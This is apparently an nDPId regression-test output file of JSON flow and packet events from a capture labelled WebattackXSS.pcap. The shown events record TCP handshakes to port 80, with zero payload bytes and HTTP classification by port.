-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347252179,"flow_last_seen":1499347257688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347253445,"flow_last_seen":1499347258688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55226,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347253445,"flow_last_seen":1499347258688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55226,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3391,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347375388,"flow_last_seen":1499347375388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347375388,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3391,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1499347375388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347375388,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VfhAAD4Gb9isEAABwKgKMtzKAFDNpCPqAAAAAKACchAZDgAAAgQFtAQCCAoBOnYSAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3392,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":1499347375388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347375388,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3MqX5dxFzaQj66AScSBaVQAAAgQFtAQCCAoD5EeIATp2EgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3393,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":3,"flow_last_seen":1499347375389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347375389,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VflAAD4Gb9+sEAABwKgKMtzKAFDNpCPrl+XcRoAQAOX5WwAAAQEICgE6dhMD5EeI"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3404,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347376638,"flow_last_seen":1499347376638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347376638,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3404,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1499347376638,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347376638,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EqdAAD4GsymsEAABwKgKMtzYAFCvXmXsAAAAAKACchD0CgAAAgQFtAQCCAoBOndLAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3405,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":2,"flow_last_seen":1499347376639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347376639,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3NhWyE7Mr15l7aAScSACsAAAAgQFtAQCCAoD5EjBATp3SwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3406,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":3,"flow_last_seen":1499347376639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347376639,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0EqhAAD4GszCsEAABwKgKMtzYAFCvXmXtVshOzYAQAOWhtwAAAQEICgE6d0sD5EjB"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347379171,"flow_last_seen":1499347379171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347379171,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56562,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1499347379171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347379171,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NzVAAD4GjpusEAABwKgKMtzyAFA14k7xAAAAAKACchCB7wAAAgQFtAQCCAoBOnnEAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":2,"flow_last_seen":1499347379171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347379171,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3PK2Txs5NeJO8qAScSBiJwAAAgQFtAQCCAoD5Es6ATp5xAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":3,"flow_last_seen":1499347379172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347379172,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NzZAAD4GjqKsEAABwKgKMtzyAFA14k7ytk8bOoAQAOUBLwAAAQEICgE6ecQD5Es6"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3434,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347380424,"flow_last_seen":1499347380424,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347380424,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3434,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1499347380424,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347380424,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8PTxAAD4GiJSsEAABwKgKMt0AAFCXo0fBAAAAAKACchAmFwAAAgQFtAQCCAoBOnr9AAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3435,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":1499347380424,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347380424,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3QDrAYLNl6NHwqAScSBozwAAAgQFtAQCCAoD5ExzATp6\/QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3436,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":3,"flow_last_seen":1499347380425,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347380425,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PT1AAD4GiJusEAABwKgKMt0AAFCXo0fC6wGCzoAQAOUH1wAAAQEICgE6ev0D5Exz"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3446,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347381694,"flow_last_seen":1499347381694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347381694,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3446,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1499347381694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347381694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Vu9AAD4GbuGsEAABwKgKMt0OAFBD4SrUAAAAAKACchCVegAAAgQFtAQCCAoBOnw7AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3447,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":2,"flow_last_seen":1499347381694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347381694,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Q7aUZP1Q+Eq1aAScSDWfAAAAgQFtAQCCAoD5E2xATp8OwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3448,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":3,"flow_last_seen":1499347381694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347381694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VvBAAD4GbuisEAABwKgKMt0OAFBD4SrV2lGT9oAQAOV1hAAAAQEICgE6fDsD5E2x"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3464,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347384186,"flow_last_seen":1499347384186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384186,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56616,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3464,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1499347384186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347384186,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bHdAAD4GWVmsEAABwKgKMt0oAFALKxLdAAAAAKACchDjngAAAgQFtAQCCAoBOn6qAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3465,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":1499347384186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347384186,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Sg6aAAMCysS3qAScSBWBQAAAgQFtAQCCAoD5FAgATp+qgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":3,"flow_last_seen":1499347384187,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347384187,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bHhAAD4GWWCsEAABwKgKMt0oAFALKxLeOmgADYAQAOX1DAAAAQEICgE6fqoD5FAg"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347254714,"flow_last_seen":1499347260689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55240,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347254714,"flow_last_seen":1499347260689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55240,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347257224,"flow_last_seen":1499347262689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55266,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347257224,"flow_last_seen":1499347262689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347258474,"flow_last_seen":1499347263689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55280,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347258474,"flow_last_seen":1499347263689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347259759,"flow_last_seen":1499347265691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55294,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347259759,"flow_last_seen":1499347265691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55294,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347262289,"flow_last_seen":1499347267691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347262289,"flow_last_seen":1499347267691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347263542,"flow_last_seen":1499347268692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55334,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347263542,"flow_last_seen":1499347268692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55334,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347385481,"flow_last_seen":1499347385481,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347385481,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1499347385481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347385481,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VSxAAD4GcKSsEAABwKgKMt02AFBQ3SrBAAAAAKACchCEtwAAAgQFtAQCCAoBOn\/tAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3477,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":2,"flow_last_seen":1499347385481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347385481,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3TZsZa1KUN0qwqAScSAWnwAAAgQFtAQCCAoD5FFjATp\/7QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":3,"flow_last_seen":1499347385481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347385481,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VS1AAD4GcKusEAABwKgKMt02AFBQ3SrCbGWtS4AQAOW1pQAAAQEICgE6f+4D5FFj"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3492,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347386736,"flow_last_seen":1499347386736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347386736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56644,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3492,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1499347386736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347386736,"pkt":"ABm5CmnxAMGxFOsxCABFAAA85qBAAD4G3y+sEAABwKgKMt1EAFDnQGeHAAAAAKACchCwRQAAAgQFtAQCCAoBOoEnAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3493,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":2,"flow_last_seen":1499347386736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347386736,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3URBkoPY50BniKAScSCVOAAAAgQFtAQCCAoD5FKdATqBJwEDAwc="} 